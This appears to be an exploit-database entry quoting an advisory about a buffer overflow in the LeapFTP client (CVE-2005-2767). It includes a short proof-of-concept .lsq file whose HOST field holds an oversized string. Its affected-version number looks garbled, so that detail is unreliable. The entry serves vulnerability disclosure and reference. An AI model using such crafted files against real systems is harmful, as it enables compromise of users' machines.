source: http://www.securityfocus.com/bid/14655/info LeapFTP client is prone to a remote buffer overflow vulnerability. The issue arises when the client handles a malformed LeapFTP Site Queue (.lsq) file. A remote attacker may gain unauthorized access in the context of the user running the application. LeapFTP versions prior to 188.8.131.522 are affected by this vulnerability. //bof.lsq [HOSTINFO] HOST=AAAAA...[ long string ]...AAAAA USER=username PASS=password [FILES] "1","/winis/ApiList.zip","477,839","E:\ApiList.zip"
Related ExploitsTrying to match CVEs (1): CVE-2005-2767
Trying to match OSVDBs (1): 18950
Other Possible E-DB Search Terms: LeapFTP Client 2.7.3/2.7.4, LeapFTP Client 2.7.3, LeapFTP Client